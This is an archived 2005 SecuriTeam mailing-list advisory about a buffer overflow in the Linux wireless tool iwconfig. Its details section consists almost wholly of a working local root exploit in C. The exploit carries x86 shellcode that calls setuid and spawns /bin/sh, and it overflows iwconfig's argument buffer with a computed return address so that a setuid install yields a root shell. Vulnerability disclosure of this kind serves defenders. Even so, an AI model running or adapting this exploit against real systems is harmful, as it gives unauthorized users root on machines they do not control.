[EXPL] Iwconfig Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 08/16/05

  • Next message: SecuriTeam: "[EXPL] Ifenslave Buffer Overflow"
    To: list@securiteam.com
    Date: 16 Aug 2005 17:07:26 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Iwconfig Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

    Iwconfig "is similar to ifconfig, but is dedicated to the wireless
    interfaces. It is used to set the parameters of the network interface
    which are specific to the wireless operation". A buffer overflow
    vulnerability in iwconfig allows a local attacker to gain root privileges
    wherever the program is installed with setuid privileges.

    DETAILS

    Exploit Code:
    //Diabolic Crab's Local Root Exploit
    ///usr/sbin/iwconfig or /sbin/iwconfig
    //dcrab@hackerscenter.com
    //www.hackerscenter.com

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    char shellcode[]=
            "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid() */
            "\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd"
            "\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80"
            "\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0"
            "\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50"
            "\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89"
            "\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
            "\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

    int main(int argc,char **argv){
       char buf[96];
       unsigned long ret;
       int i;

       char *prog[]={"/sbin/iwconfig",buf,NULL};
       char *env[]={"EGG=",shellcode,NULL};

       ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
       printf("use ret addr: 0x%x\n",ret);

       memset(buf,0x41,sizeof(buf));
       memcpy(&buf[92],&ret,4);

       execve(prog[0],prog,env);

      }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dcrab@hackerscenter.com>
    Dcrab.
    The original article can be found at:
    <http://icis.digitalparadox.org/~dcrab/dc_iwconfig.c>
    http://icis.digitalparadox.org/~dcrab/dc_iwconfig.c

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[EXPL] Ifenslave Buffer Overflow"

    Relevant Pages

    • [NEWS] Outgun Multiple Vulnerabilities (Multiple DoS, Multiple Buffer Overflows)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Multiple Buffer Overflows) ... The buffers in which the server stores these two strings have a size of 64 ... int alen, ulen; ...
      (Securiteam)
    • [UNIX] Cfengine Remotely Exploitable Buffer Overflow (net.c)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... cfservd daemon in Cfengine 2.x prior to version 2.0.8. ... unsigned int len = 0; ... void getshell; ...
      (Securiteam)
    • [NT] Stronghold DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... In the packet used for joining the server is locatd the client's nickname ... unsigned char *gssdkcr( ... void show_info(u_char *data, int len); ...
      (Securiteam)
    • [UNIX] Remote Format String Vulnerabilities in eXtremail Server (MAIL FROM, Reappearing)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... to promote the most advanced vulnerability assessment solutions today. ... int send_sock; ... strncat (buf, "a", 1); ...
      (Securiteam)
    • [NT] eTrust Secure Content Manager Denial of Service
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... int putxx(u8 *data, u32 num, int bits); ... send(sd, buff, p - buff, 0); ...
      (Securiteam)